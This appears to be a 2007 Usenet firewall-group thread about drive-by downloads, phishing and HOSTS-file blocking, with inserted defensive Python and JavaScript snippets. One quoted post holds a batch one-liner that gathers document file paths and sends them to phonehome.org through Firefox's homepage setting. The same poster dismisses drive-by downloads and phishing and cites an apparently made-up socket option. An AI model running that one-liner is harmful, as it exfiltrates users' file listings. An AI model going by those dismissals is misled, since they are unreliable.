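    gaps = set()
    for host in observed:
        if not is_blocked(table, host) and base_domain(host) in blocked_bases:
            gaps.add(normalize(host))
    return sorted(gaps)


if __name__ == "__main__":
    hosts = parse_hosts(SAMPLE_HOSTS)
    for name in OBSERVED:
        print(f"{'blocked' if is_blocked(hosts, name) else 'resolves':8}  {name}")
    print("not covered by the file:", coverage_gaps(hosts, OBSERVED))
```

Run against a real HOSTS file and a resolver or proxy log, the gap list shows how many names under already-listed domains the file never matches.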
Re: Jetico Personal Firewall freeware asks way to many questions
am 05.11.2007 20:29:35 von Sebastian Gottschalk
John Adams wrote:
> Sebastian G. wrote:
>
>> It clogs the HKLM\Software\Classes\CLSID full of useless entries.
>
> And how does that mess anything up? The registry size has no effect on
> OS performance under XP and Vista, unlike Win9x.
That's wrong, since it consumes memory and disk resources, as well as it
slows down key traversal (which is quite the common thing exactly for the
CLSID subkey).
Re: Jetico Personal Firewall freeware asks way to many questions
am 06.11.2007 05:21:48 von kurt wismer
Sebastian G. wrote:
[snip]
> Aside from that, Drive-by-downloads are a well-known myth,
that, i think, says it all...
--
"it's not the right time to be sober
now the idiots have taken over
spreading like a social cancer,
is there an answer?"
Re: Jetico Personal Firewall freeware asks way to many questions
am 06.11.2007 08:15:35 von John Adams
Sebastian G. wrote:
>
> That's wrong, since it consumes memory and disk resources, as well as it
> slows down key traversal (which is quite the common thing exactly for
> the CLSID subkey).
Not enough to be concerned about.
Re: Jetico Personal Firewall freeware asks way to many questions
am 06.11.2007 14:37:40 von Sebastian Gottschalk
kurt wismer wrote:
> Sebastian G. wrote:
> [snip]
>> Aside from that, Drive-by-downloads are a well-known myth,
>
> that, i think, says it all...
Seems like a sarcastic expression of doubt, but of course it's a myth.
There's no general way that just by visiting a website malware could be
installed. What's needed that this actually works is a vulnerable webbrowser
or something that is abused as such, and the trivial solution to this
problem is not using a vulnerable webbrowser, thus it's anything but
unavoidable.
Instead of now throwing away their broken webbrowser or stop abusing a
non-webbrowser as such those fools instead created a buzzword to blame their
own incompetence on, and this buzzword is "drive-by-downloads".
Re: Jetico Personal Firewall freeware asks way to many questions
am 07.11.2007 06:19:58 von kurt wismer
Sebastian G. wrote:
> kurt wismer wrote:
>
>> Sebastian G. wrote:
>> [snip]
>>> Aside from that, Drive-by-downloads are a well-known myth,
>>
>> that, i think, says it all...
>
> Seems like a sarcastic expression of doubt, but of course it's a myth.
> There's no general way that just by visiting a website malware could be
> installed. What's needed that this actually works is a vulnerable
> webbrowser or something that is abused as such, and the trivial solution
> to this problem is not using a vulnerable webbrowser, thus it's anything
> but unavoidable.
> Instead of now throwing away their broken webbrowser or stop abusing a
> non-webbrowser as such those fools instead created a buzzword to blame
> their own incompetence on, and this buzzword is "drive-by-downloads".
a) i'm unaware of anyone saying that drive-by-downloads don't depend on
the existence of vulnerabilities... as far as i know the dependence on
vulnerabilities is a widely accepted attribute of drive-by-downloads...
b) the fact that they depend on vulnerabilities and/or the fact that
they are avoidable doesn't make them any less real, it just makes them
significantly less than a silver bullet for the bad guys...
c) things that are real are generally not referred to as myths...
--
"it's not the right time to be sober
now the idiots have taken over
spreading like a social cancer,
is there an answer?"
Re: Jetico Personal Firewall freeware asks way to many questions
am 07.11.2007 06:51:41 von Dustin Cook
kurt wismer wrote in
news:fgrhuq$n71$1@registered.motzarella.org:
> Sebastian G. wrote:
>> kurt wismer wrote:
>>
>>> Sebastian G. wrote:
>>> [snip]
>>>> Aside from that, Drive-by-downloads are a well-known myth,
>>>
>>> that, i think, says it all...
>>
>> Seems like a sarcastic expression of doubt, but of course it's a
>> myth. There's no general way that just by visiting a website malware
>> could be installed. What's needed that this actually works is a
>> vulnerable webbrowser or something that is abused as such, and the
>> trivial solution to this problem is not using a vulnerable
>> webbrowser, thus it's anything but unavoidable.
>> Instead of now throwing away their broken webbrowser or stop abusing
>> a non-webbrowser as such those fools instead created a buzzword to
>> blame their own incompetence on, and this buzzword is
>> "drive-by-downloads".
>
> a) i'm unaware of anyone saying that drive-by-downloads don't depend
> on the existence of vulnerabilities... as far as i know the dependence
> on vulnerabilities is a widely accepted attribute of
> drive-by-downloads... b) the fact that they depend on vulnerabilities
> and/or the fact that they are avoidable doesn't make them any less
> real, it just makes them significantly less than a silver bullet for
> the bad guys... c) things that are real are generally not referred to
> as myths...
>
You know you're wasting your time, right? I can't even get the fellow to
answer my questions regarding BugHunter, despite the fact he spent a
little time assuming what it does or doesn't do and went from there.
--
Dustin Cook, Author of BugHunter - MalWare Removal Tool - v2.2d
Email.: bughunter.dustin@gmail.com
Web...: http://bughunter.it-mate.co.uk
Pad...: http://bughunter.it-mate.co.uk/pad.xml
PGP...: http://bughunter.it-mate.co.uk/bughunter.dustin.txt
Re: Jetico Personal Firewall freeware asks way to many questions
am 07.11.2007 06:56:53 von Sebastian Gottschalk
Dustin Cook wrote:
> I can't even get the fellow to answer my questions regarding BugHunter,
> despite the fact he spent a little time assuming what it does or doesn't
> do and went from there.
The reasons I didn't bother to answer your questions are two-fold:
- You roughly tried to imply that I talked about something that I didn't
test, which is something I'd never do.
- For the other things I had already given an answer.
Re: Jetico Personal Firewall freeware asks way to many questions
am 07.11.2007 07:04:20 von Sebastian Gottschalk
kurt wismer wrote:
> a) i'm unaware of anyone saying that drive-by-downloads don't depend on
> the existence of vulnerabilities... as far as i know the dependence on
> vulnerabilities is a widely accepted attribute of drive-by-downloads...
AFAICS things are typically stated like "it just happens naturally".
> b) the fact that they depend on vulnerabilities and/or the fact that
> they are avoidable doesn't make them any less real, it just makes them
> significantly less than a silver bullet for the bad guys...
Aside from the serious need for any actual vulnerability, which is truly
hard to find, the avoidability is exactly the point that makes the
qualification void. "Drive-by-downloads" are more or less a description of a
seemingly natural, unavoidable phenomenon to shift off responsibility.
BTW, what exactly differs a "drive-by-download" from a "webbrowser exploit"
as we've called it since ever?
> c) things that are real are generally not referred to as myths...
Things that aren't like they're categorized aren't real, though. Just like
"tracking cookies", "phone home" or "phishing".
Re: Jetico Personal Firewall freeware asks way to many questions
am 07.11.2007 16:04:43 von Dustin Cook
"Sebastian G." wrote in
news:5pd2dfFqn882U2@mid.dfncis.de:
> Dustin Cook wrote:
>
>> I can't even get the fellow to answer my questions regarding
>> BugHunter, despite the fact he spent a little time assuming what it
>> does or doesn't do and went from there.
>
>
> The reasons I didn't bother to answer your questions are two-fold:
>
> - You roughly tried to imply that I talked about something that I
> didn't test, which is something I'd never do.
I didn't imply anything, sir. Your post follows below:
From: "Sebastian G."
Newsgroups: comp.security.firewalls,alt.privacy.spyware
Subject: Re: Jetico Personal Firewall freeware asks way to many questions
Date: Thu, 01 Nov 2007 00:59:08 +0100
Message-ID: <5osj6pFnsfqvU1@mid.dfncis.de>
Dustin Cook wrote:
> I don't dispute that BugHunter is retroactive in what it does, and I
> wouldn't want anyone to think they are 100% safe regardless of the
> software they use, but I still believe some protection, even if it's
> retroactive in nature is better than none.
Aside from the added complexity and the inability of the user to judge
the output of the mentioned program, what exactly is a shitload of false
positives worth? Say it, f.e., claims that there's some oh-so-bad
"tracking cookie", and as well a trojan horse in user32.dll (because it
doesn't match the original one any more, probably due to a normal
update). Now it deletes both, demands a shutdown, and the system doesn't
boot up anymore.
Just try running it over a completely fresh install of Windows, or even
over a well secured system with a lot of known-good third-party
software, and the shame of its report. Same goes for almost any malware
scanner under the sun.
Now then, if you weren't talking about BugHunter, as I clearly was, what
the hell were you going off about?
--
Dustin Cook, Author of BugHunter - MalWare Removal Tool - v2.2d
Email.: bughunter.dustin@gmail.com
Web...: http://bughunter.it-mate.co.uk
Pad...: http://bughunter.it-mate.co.uk/pad.xml
PGP...: http://bughunter.it-mate.co.uk/bughunter.dustin.txt
Re: Jetico Personal Firewall freeware asks way to many questions
am 08.11.2007 07:02:05 von kurt wismer
Sebastian G. wrote:
> kurt wismer wrote:
>
>> a) i'm unaware of anyone saying that drive-by-downloads don't depend
>> on the existence of vulnerabilities... as far as i know the dependence
>> on vulnerabilities is a widely accepted attribute of
>> drive-by-downloads...
>
> AFAICS things are typically stated like "it just happens naturally".
that could just as easily be an interpretation that is peculiar to you
alone...
it is something that is likely to happen (or to have happened, as in
'that's the way the malware got in') to quite a few average users because
it's not easy to avoid being vulnerable nor to avoid being exposed...
>> b) the fact that they depend on vulnerabilities and/or the fact that
>> they are avoidable doesn't make them any less real, it just makes them
>> significantly less than a silver bullet for the bad guys...
>
>
> Aside from the serious need for any actual vulnerability, which is
> truly hard to find,
hard to find a vulnerability? on what planet?
> the avoidability is exactly the point that makes
> the qualification void. "Drive-by-downloads" are more or less a
> description of a seemingly natural, unavoidable phenomenon to shift off
> responsibility.
i'm wondering what exactly you mean by avoidability here... do you mean
it should be easy to avoid being exposed? you are aware that these types
of exploits have been known to be injected into the ad rotation of
legitimate, otherwise trustworthy sites, right?
> BTW, what exactly differs a "drive-by-download" from a "webbrowser
> exploit" as we've called it since ever?
well, consider the possibility that a web browser is not the only
component on your system involved in rendering the content on a given
web page... the browser renders the html, but what about scripts? what
about multimedia? what about other document formats like pdf?
>> c) things that are real are generally not referred to as myths...
>
>
> Things that aren't like they're categorized aren't real, though.
strange, most people would refer to that simply as hype rather than full
non-reality...
> Just
> like "tracking cookies", "phone home" or "phishing".
you don't think phishing is real either? oh boy...
--
"it's not the right time to be sober
now the idiots have taken over
spreading like a social cancer,
is there an answer?"
Re: Jetico Personal Firewall freeware asks way to many questions
am 08.11.2007 09:44:00 von Sebastian Gottschalk
kurt wismer wrote:
>> AFAICS things are typically stated like "it just happens naturally".
>
> that could just as easily be an interpretation that is peculiar to you
> alone...
Sorry, but it's exactly what I see in real life.
> it is something that is likely to happen (or to have happened, as in
> 'that's the way the malware got in') to quite a few average users because
> it's not easy to avoid being vulnerable nor to avoid being exposed...
Nonsense, it is really easy because almost every webbrowser is secure by
default out-of-the-box.
>> Aside from the serious need for any actual vulnerability, which is
>> truly hard to find,
>
> hard to find a vulnerability? on what planet?
On this planet. Show me an up-to-date webbrowser with an unpatched
vulnerability and/or a bad security history (that is, there have been large
non-negative delays between vulnerability and patch and no workarounds).
> i'm wondering what exactly you mean by avoidability here... do you mean
> it should be easy to avoid being exposed?
It's hard getting exposed at all.
> you are aware that these types
> of exploits have been known to be injected into the ad rotation of
> legitimate, otherwise trustworthy sites, right?
Right. The exposure is measured by the security of the webbrowser, and
nothing else.
>> BTW, what exactly differs a "drive-by-download" from a "webbrowser
>> exploit" as we've called it since ever?
>
> well, consider the possibility that a web browser is not the only
> component on your system involved in rendering the content on a given
> web page... the browser renders the html, but what about scripts?
ECMAScript is obviously interpreted by the webbrowser as well.
> what about multimedia? what about other document formats like pdf?
That's external. Do you let such things load by default or what?
> strange, most people would refer to that simply as hype rather than full
> non-reality...
Indeed, since the phenomena don't belong to the description.
>> Just like "tracking cookies", "phone home" or "phishing".
>
> you don't think phishing is real either? oh boy...
Phishing is described as a problem of the webbrowser and/or the WWW, but
it's solely a PEBKAC problem, thus it's a problem within the user and the
phenomenon only a result of this. For any minimally competent user phishing
purely is a non-threat.
Re: Jetico Personal Firewall freeware asks way to many questions
am 09.11.2007 11:30:47 von John Adams
Sebastian G. wrote:
> If the application isn't malicious, then you don't need to enforce that
> it does what exactly it does. On the contrary, if you think that it does
> something that it shouldn't do, then you're already considering it as
> malicious.
No, maybe someone just doesn't want it to do things like phone home to
look for an update and it has no option to set it that way. Maybe they
want to block a game's adserver, some of them have that now, oh, they
could use the hosts file to do that too but you are also against that.
I bet you are a spyware programmer trying to mislead people to make your
job easier. Why else would you hang out in a boring firewall group day
after day?
Re: Jetico Personal Firewall freeware asks way to many questions
am 09.11.2007 11:35:32 von John Adams
Sebastian G. wrote:
> You're kidding, right? I show a very very easy, highly portable and not
> specifically targeting way to phone home as you like:
>
> set x=
> for /r %i (*.doc *.xls *.ppt) do set x=%x%^;%i
> for /r %i in (prefs.js) do echo
> user_pref("browser.startup.homepage"^,"http://phonehome.org? %x%")^;>>"%i"
Well, if you are not a spyware programmer you are definitely a script kiddy.
Re: Jetico Personal Firewall freeware asks way to many questions
am 09.11.2007 14:26:13 von kurt wismer
Sebastian G. wrote:
> kurt wismer wrote:
>
>>> AFAICS things are typically stated like "it just happens naturally".
>>
>> that could just as easily be an interpretation that is peculiar to you
>> alone...
>
> Sorry, but it's exactly what I see in real life.
here's the thing, it's *still* presented in a way that's open to
interpretation... your interpretation is that 'it just happens
naturally' on hardened systems while other possible interpretations
could easily include 'it just happens naturally' for most average users
(who, by the way, don't have hardened systems)...
>> it is something that is likely to happen (or to have happened, as in
>> 'that's the way the malware got in') to quite a few average users
>> because it's not easy to avoid being vulnerable nor to avoid being
>> exposed...
>
> Nonsense, it is really easy because almost every webbrowser is secure by
> default out-of-the-box.
now you're just being absurd....
>>> Aside from the serious need for any actual vulnerability, which is
>>> truly hard to find,
>>
>> hard to find a vulnerability? on what planet?
>
> On this planet. Show me an up-to-date webbrowser with an unpatched
> vulnerability and/or a bad security history (that is, there have been
> large non-negative delays between vulnerability and patch and no
> workarounds).
vulnerabilities exist in most non-trivial programs whether the good guys
know about them or not so i will say *all* web browsers have unpatched
vulnerabilities and time will bear me out...
and no, the bad guys don't depend on vulnerabilities already known to
the good guys... they have their own black hat researchers and their own
vulnerability black market...
>> i'm wondering what exactly you mean by avoidability here... do you
>> mean it should be easy to avoid being exposed?
>
> It's hard getting exposed at all.
no, it's not... it's quite easy because the exploits can be served
through mainstream sites like cnn.com...
>> you are aware that these types of exploits have been known to be
>> injected into the ad rotation of legitimate, otherwise trustworthy
>> sites, right?
>
> Right. The exposure is measured by the security of the webbrowser, and
> nothing else.
wrong... exposure has to do with whether you came in contact with it,
not whether you got compromised by it...
>>> BTW, what exactly differs a "drive-by-download" from a "webbrowser
>>> exploit" as we've called it since ever?
>>
>> well, consider the possibility that a web browser is not the only
>> component on your system involved in rendering the content on a given
>> web page... the browser renders the html, but what about scripts?
>
> ECMAScript is obviously interpreted by the webbrowser as well.
aside from the fact that that is not the only script language out there...
>> what about multimedia? what about other document formats like pdf?
>
> That's external. Do you let such things load by default or what?
of course it's external, that's the point... rendering web content
normally involves external functionality in addition to what's built
into the browser... even rendering images is 'external' (and has been a
source of problems - see wmf and vml)...
and yes, people let those things load/run by default... when they click
on a pdf link they expect to see the pdf in their browser.. when they
visit a flash site they expect the flash to just work automagically...
>> strange, most people would refer to that simply as hype rather than
>> full non-reality...
>
> Indeed, since the phenomena don't belong to the description.
it doesn't belong to the strawman you use as a description, no...
>>> Just like "tracking cookies", "phone home" or "phishing".
>>
>> you don't think phishing is real either? oh boy...
>
> Phishing is described as a problem of the webbrowser and/or the WWW, but
> it's solely a PEBKAC problem, thus it's a problem within the user and
> the phenomenon only a result of this. For any minimally competent user
> phishing purely is a non-threat.
it seems dustin is correct, i'm wasting my time here... it's
unreasonable to expect users to know that paypalsecurity.com is
registered to a different entity than paypal.com is...
--
"it's not the right time to be sober
now the idiots have taken over
spreading like a social cancer,
is there an answer?"
Re: Jetico Personal Firewall freeware asks way to many questions
am 09.11.2007 15:31:33 von Sebastian Gottschalk
John Adams wrote:
> Sebastian G. wrote:
>
>> If the application isn't malicious, then you don't need to enforce that
>> it does what exactly it does. On the contrary, if you think that it does
>> something that it shouldn't do, then you're already considering it as
>> malicious.
>
> No, maybe someone just doesn't want it to do things like phone home to
> look for an update and it has no option to set it that way.
Then you're considering it as malicious. (does something you don't want
without asking for permission)
> Maybe they want to block a game's adserver,
Then you're considering it as malicious. Aside from that, that typically
makes the software non-working and also typically violates the EULA.
> could use the hosts file to do that too but you are also against that.
Well, maybe because it doesn't work?
Keyword: setsockopt(&socket, SOCKOPT_NO_HOSTS);
Re: Jetico Personal Firewall freeware asks way to many questions
am 09.11.2007 15:42:42 von Sebastian Gottschalk
kurt wismer wrote:
> here's the thing, it's *still* presented in a way that's open to
> interpretation... your interpretation is that 'it just happens
> naturally' on hardened systems while other possible interpretations
> could easily include 'it just happens naturally' for most average users
> (who, by the way, don't have hardened systems)...
You don't need a hardened system to be secure against the typical threats of
connecting a machine to the internet. And on not especially hardened systems
it's still true that such things really don't need to happen naturally.
>> Nonsense, it is really easy because almost every webbrowser is secure by
>> default out-of-the-box.
>
> now you're just being absurd....
Or correct. Just take a look at the major players Mozilla Firefox, Mozilla
Seamonkey, Opera, Konqueror and w3m. Agreed, Mozilla Firefox is a bit
obscure, but nevertheless still secure by default.
> vulnerabilities exist in most non-trivial programs whether the good guys
> know about them or not so i will say *all* web browsers have unpatched
> vulnerabilities and time will bear me out...
>
> and no, the bad guys don't depend on vulnerabilities already known to
> the good guys... they have their own black hat researchers and their own
> vulnerability black market...
Thanks for stating the trivial exception that doesn't need to be discussed.
Now, can you present some incidents showing any significant relevance?
>> It's hard getting exposed at all.
>
> no, it's not... it's quite easy because the exploits can be served
> through mainstream sites like cnn.com...
Exposure is measured by the vulnerabilities, not by the websites serving
them. Who the hell cares if cnn.com serves some third-party scripts with
malicious intent as long as the intent can't materialize into an actual
compromise?
> wrong... exposure has to do with whether you came in contact with it,
> not whether you got compromised by it...
In that case, exposure should be about 100% and every system would be
compromised. Not. Without an unpatched vulnerability, that's a no-go.
>> ECMAScript is obviously interpreted by the webbrowser as well.
>
> aside from the fact that that is not the only script language out there...
Huh? It is, especially due to imply by the HTML standard. It's also that I
have yet to see a webbrowser supporting any additional scripting language.
>>> what about multimedia? what about other document formats like pdf?
>> That's external. Do you let such things load by default or what?
>
> of course it's external, that's the point... rendering web content
> normally involves external functionality in addition to what's built
> into the browser... even rendering images is 'external' (and has been a
> source of problems - see wmf and vml)...
External ! embedded. And which webbrowser renders WMF and VML?
> it seems dustin is correct, i'm wasting my time here... it's
> unreasonable to expect users to know that paypalsecurity.com is
> registered to a different entity than paypal.com is...
Sure it's reasonable, you just shouldn't expect people to be reasonable.
Heck, when you don't know the URL syntax, then you should expect to run into
security problems. Still it's the user's fault, for intentionally ignoring
minimum required knowledge.
Re: Jetico Personal Firewall freeware asks way to many questions
am 10.11.2007 05:49:07 von John Adams
Sebastian G. wrote:
> Well, maybe because it doesn't work?
> Keyword: setsockopt(&socket, SOCKOPT_NO_HOSTS);
It works for game ad servers (it has been tested by me and many
other gamers) and any EULA that says you can't block ads wouldn't have a
legal leg to stand on. Just because an app phones home to check for
updates doesn't make it malicious but I may want to block it anyway just
because I can.
And you are wrong about drive by downloads (referring to another post of
yours). Maybe you need to bone up on the latest bots that are out there
in the wild.
Re: Jetico Personal Firewall freeware asks way to many questions
am 10.11.2007 08:30:05 von Nomen Nescio
Sebastian G. wrote:
> Dustin Cook wrote:
>
> > I can't even get the fellow to answer my questions regarding BugHunter,
> > despite the fact he spent a little time assuming what it does or doesn't
> > do and went from there.
>
>
> The reasons I didn't bother to answer your questions are two-fold:
>
> - You roughly tried to imply that I talked about something that I didn't
> test, which is something I'd never do.
You are a liar. Just in the past few days you tried to defend another
one of your assumptive pontifications with the immortal logic "well,
that's what other people are reporting".
It's pretty obvious from reading your posts, that you actually test
very little if anything that you blubber about. Your only skill, if it
can be called that, is wording things in such an ambiguous way that
there's nothing to really dissect. And then insisting it's right.
Re: Jetico Personal Firewall freeware asks way to many questions
am 10.11.2007 11:42:21 von Sebastian Gottschalk
John Adams wrote:
> Sebastian G. wrote:
>
>> Well, maybe because it doesn't work?
>> Keyword: setsockopt(&socket, SOCKOPT_NO_HOSTS);
>
> It works for game ad servers (it has been tested by me and many
> other gamers)
We're talking about malicious applications here.
> and any EULA that says you can't block ads wouldn't have a legal leg
> to stand on.
It has, fortunately for all the legitimate adware business.
> Just because an app phones home to check for
> updates doesn't make it malicious
We're not talking about updates. And indeed, if it was such an update
functionality that could not be disabled by means of configuration, it
should be considered as malicious.
> And you are wrong about drive by downloads (referring to another post of
> yours). Maybe you need to bone up on the latest bots that are out there
> in the wild.
Which are all due to PEBKAC, not hypothetical magic vulnerability fairies.
Re: Jetico Personal Firewall freeware asks way to many questions
am 10.11.2007 14:02:55 von unknown
Post removed (X-No-Archive: yes)
Re: Jetico Personal Firewall freeware asks way to many questions
am 10.11.2007 22:38:57 von kurt wismer
Sebastian G. wrote:
> kurt wismer wrote:
>
[snip]
>>> Nonsense, it is really easy because almost every webbrowser is secure
>>> by default out-of-the-box.
>>
>> now you're just being absurd....
>
>
> Or correct. Just take a look at the major players Mozilla Firefox,
> Mozilla Seamonkey, Opera, Konqueror and w3m. Agreed, Mozilla Firefox is
> a bit obscure, but nevertheless still secure by default.
and the absurdity continues... apparently internet exploder (what most
people use to browse the web with) doesn't exist in your world, and of
the browsers that do exist firefox (of all things) is the one you
consider obscure...
>> vulnerabilities exist in most non-trivial programs whether the good
>> guys know about them or not so i will say *all* web browsers have
>> unpatched vulnerabilities and time will bear me out...
>>
>> and no, the bad guys don't depend on vulnerabilities already known to
>> the good guys... they have their own black hat researchers and their
>> own vulnerability black market...
>
> Thanks for stating the trivial exception that doesn't need to be
> discussed. Now, can you present some incidents showing any significant
> relevance?
let's just be perfectly clear, here... you want me to list documented
vulnerabilities in mainstream browsers for which there is no patch yet...
i just explained 2 things... the first was that the vulnerabilities that
would get documented in the fashion you're looking for are not
necessarily the ones that are actually relevant to this discussion (it's
the ones that the blackhats know about but the whitehats don't that are
most relevant)...
the second was that we can take the assertion that most browsers contain
unpatched vulnerabilities as axiomatically true and let time do the work
of revealing the details of those vulnerabilities... in other words, if
browsers and all the components that plug into them never need security
updates ever again then you were right, otherwise not so much..
but, just to put the last nails in the coffin of the debate on how easy
it is to find vulnerabilities, these articles are all from the past
month and each one is about something different and has something
related to web browsing...
http://blogs.zdnet.com/security/?p=636
http://blogs.zdnet.com/security/?p=652
http://www.symantec.com/enterprise/security_response/weblog/2007/10/when_pdfs_attack_again.html
http://isc.sans.org/diary.html?storyid=3540
http://www.symantec.com/enterprise/security_response/weblog/2007/10/realplayer_exploit_on_the_loos.html
http://securitywatch.eweek.com/apple/safari_for_windows.html
http://www.liquidmatrix.org/blog/2007/10/12/apple-ipod-touch-iphone-tiff-vulnerability/
http://securitywatch.eweek.com/vulnerability_research/three_new_classes_of_vulnerabilities_with_no_cure_whatsoever_1.html
>>> It's hard getting exposed at all.
>>
>> no, it's not... it's quite easy because the exploits can be served
>> through mainstream sites like cnn.com...
>
>
> Exposure is measured by the vulnerabilities, not by the websites serving
> them. Who the hell cares if cnn.com serves some third-party scripts with
> malicious intent as long as the intent can't materialize into an actual
> compromise?
>
>> wrong... exposure has to do with whether you came in contact with it,
>> not whether you got compromised by it...
>
>
> In that case, exposure should be about 100% and every system would be
> compromised. Not. Without an unpatched vulnerability, that's a no-go.
it's clear to me that you are equating exposure to compromise, in spite
of the fact that (for example) you can be exposed to a biological
contagion without getting sick...
>>> ECMAScript is obviously interpreted by the webbrowser as well.
>>
>> aside from the fact that that is not the only script language out
>> there...
>
>
> Huh? It is, especially due to imply by the HTML standard. It's also that
> I have yet to see a webbrowser supporting any additional scripting
> language.
the majority of web users still use ie, ie supports additional scripting
languages, and ie's jscript interpreter is separate...
>>>> what about multimedia? what about other document formats like pdf?
>>> That's external. Do you let such things load by default or what?
>>
>> of course it's external, that's the point... rendering web content
>> normally involves external functionality in addition to what's built
>> into the browser... even rendering images is 'external' (and has been
>> a source of problems - see wmf and vml)...
>
>
> External ! embedded. And which webbrowser renders WMF and VML?
no browser does, the browser hands that job off to a different component...
>> it seems dustin is correct, i'm wasting my time here... it's
>> unreasonable to expect users to know that paypalsecurity.com is
>> registered to a different entity than paypal.com is...
>
> Sure it's reasonable, you just shouldn't expect people to be reasonable.
> Heck, when you don't know the URL syntax, then you should expect to run
> into security problems. Still it's the user's fault, for intentionally
> ignoring minimum required knowledge.
oh it is reasonable? ok then i suppose i can reasonably expect you to a)
list the primary domains of all the sites you visit regularly and b)
list *every* *single* domain that is also registered to those entities...
that is essentially what you're expecting others to be able to do... so
go ahead, list away...
--
"it's not the right time to be sober
now the idiots have taken over
spreading like a social cancer,
is there an answer?"
Re: Jetico Personal Firewall freeware asks way to many questions
am 11.11.2007 00:13:38 von Sebastian Gottschalk
kurt wismer wrote:
> and the absurdity continues... apparently internet exploder (what most
> people use to browse the web with) doesn't exist in your world,
It does, but it isn't a webbrowser and therefore counts as PEBKAC. It's
futile to discuss it in any security content since it's well documented to
not be supposed to provide security in a hostile environment.
> and of the browsers that do exist firefox (of all things) is the one you
> consider obscure...
Which becomes quite clear when looking at the internals of Mozilla
Seamonkey. The developers of Firefox don't even bother exposing really
important configuration options in the UI or not even at all, the coding
style of the components is horrible and full of stupid ideas (with the
firefoxurl: protocol handler being the most recent absurdity).
> i just explained 2 things... the first was that the vulnerabilities that
> would get documented in the fashion you're looking for are not
> necessarily the ones that are actually relevant to this discussion (it's
> the ones that the blackhats know about but the whitehats don't that are
> most relevant)...
This is a principle attack vector that cannot be avoided unless you have
superior software verification mechanisms (which simply aren't practical
today). Since this is not within the decision of the vendor neither the
users, it's irrelevant to discuss.
> the second was that we can take the assertion that most browsers contain
> unpatched vulnerabilities as axiomatically true and let time do the work
> of revealing the details of those vulnerabilities... in other words, if
> browsers and all the components that plug into them never need security
> updates ever again then you were right, otherwise not so much..
You're forgetting one important detail: configuration can protect against
yet unknown vulnerabilities by reducing functional exposure.
> but, just to put the last nails in the coffin of the debate on how easy
> it is to find vulnerabilities, these articles are all from the past
> month and each one is about something different and has something
> related to web browsing...
> http://blogs.zdnet.com/security/?p=636
That's not even a vulnerability.
> http://isc.sans.org/diary.html?storyid=3540
> http://securitywatch.eweek.com/apple/safari_for_windows.html
> http://www.liquidmatrix.org/blog/2007/10/12/apple-ipod-touch-iphone-tiff-vulnerability/
And they're all patched already, with very short response time.
> http://blogs.zdnet.com/security/?p=652
That's about MSIE when used in a hostile environment, which was never
supposed to be secure. Thus it's not a security violation.
> http://www.symantec.com/enterprise/security_response/weblog/2007/10/when_pdfs_attack_again.html
> http://www.symantec.com/enterprise/security_response/weblog/2007/10/realplayer_exploit_on_the_loos.html
> http://securitywatch.eweek.com/vulnerability_research/three_new_classes_of_vulnerabilities_with_no_cure_whatsoever_1.html
And these aren't even webbrowser exploits at all.
Now is it ignorance or incompetence why you came up with these non-issues?
> it's clear to me that you are equating exposure to compromise, in spite
> of the fact that (for example) you can be exposed to a biological
> contagion without getting sick...
Oh hello, Mr. Bad Analogy Guy. The analogue world has the funny property
that you can always break a system with more brute force, whereas for
digital systems the set of input is fully enumerable (and that very trivially).
> the majority of web users still use ie, ie supports additional scripting
> languages, and ie's jscript interpreter is separate...
Abusing it as a webbrowser doesn't make it one. Of course, you don't need
any scripting, ActiveX or whatsoever to render MSIE insecure when used on
the world wide web, just like a Telnet session is always unencrypted and not
securely authenticated (which is a documented behaviour, that's why you
can't expect any security in first place).
> no browser does, the browser hands that job off to a different component...
Ok, can anyone point me over to a WMF and/or VML viewer plugin for any
decent webbrowser?
> oh it is reasonable? ok then i suppose i can reasonably expect you to a)
> list the primary domains of all the sites you visit regularly and b)
> list *every* *single* domain that is also registered to those entities...
I don't need to. I just don't create any false positive, but it's fully
secure to not trust a website belonging to an entity due to different
domain. As for your example, paypalsecurity.com doesn't belong to paypal.com
until proven otherwise, period.
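The default-deny rule from the post above (a different domain is untrusted until proven otherwise), as an added example that is not part of the thread: it compares the host a URL parser actually resolves against an assumed allowlist. `TRUSTED_DOMAINS`, the function names and the sample URLs are constructed for illustration.

```javascript
// Added example, not code from the thread.
// Assumption: the user keeps an explicit list of domains they trust.
const TRUSTED_DOMAINS = ["paypal.com"];

// Return the host a browser would actually connect to, or null when the
// string is not an absolute http(s) URL.
function effectiveHost(rawUrl) {
  let url;
  try {
    url = new URL(rawUrl);
  } catch {
    return null; // not parseable as an absolute URL
  }
  if (url.protocol !== "http:" && url.protocol !== "https:") return null;
  // The parser has already lower-cased the host and split off any
  // "user:password@" prefix; drop a trailing root dot before comparing.
  return url.hostname.replace(/\.$/, "");
}

// True only for the domain itself or a subdomain on a label boundary,
// so "notpaypal.com" and "paypal.com.example.net" do not match "paypal.com".
function isUnder(host, domain) {
  return host === domain || host.endsWith("." + domain);
}

// Default deny: anything not provably under a trusted domain is untrusted.
function classify(rawUrl, trusted = TRUSTED_DOMAINS) {
  const host = effectiveHost(rawUrl);
  if (host === null) return { host, trusted: false, matched: null };
  const matched = trusted.find((d) => isUnder(host, d)) || null;
  return { host, trusted: matched !== null, matched };
}

// Constructed sample URLs covering the look-alike patterns discussed above.
const SAMPLES = [
  "https://www.paypal.com/signin",       // real subdomain
  "https://PayPal.com./",                // case and trailing dot normalised
  "https://paypalsecurity.com/login",    // different registered domain
  "https://paypal.com.example.net/",     // trusted name used as a subdomain label
  "https://www.paypal.com@example.net/", // trusted name in the userinfo part
  "https://notpaypal.com/",              // suffix match without a label boundary
  "ftp://paypal.com/",                   // not a web URL
];

function report() {
  return SAMPLES.map((url) => ({ url, ...classify(url) }));
}

for (const row of report()) {
  console.log(`${row.trusted ? "TRUSTED  " : "UNTRUSTED"} ${row.host} <- ${row.url}`);
}
```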
Re: Jetico Personal Firewall freeware asks way to many questions
am 12.11.2007 06:55:41 von kurt wismer
Sebastian G. wrote:
> kurt wismer wrote:
>
>> and the absurdity continues... apparently internet exploder (what most
>> people use to browse the web with) doesn't exist in your world,
>
>
> It does, but it isn't a webbrowser and therefore counts as PEBKAC. It's
> futile to discuss it in any security content since it's well documented
> to not be supposed to provide security in a hostile environment.
i see...
well, all i can say is that those things you disagree with regarding
drive-by downloading apply to the world where IE *is* a web browser -
the most popular one in fact, and firefox, rather than being the obscure
one of the bunch, is probably the second most popular...
since this doesn't appear to be the world you live in i don't think i
have anything more to say to you on the subject... i'm really not
familiar enough with the properties of your world to comment on them...
--
"it's not the right time to be sober
now the idiots have taken over
spreading like a social cancer,
is there an answer?"
Re: Jetico Personal Firewall freeware asks way to many questions
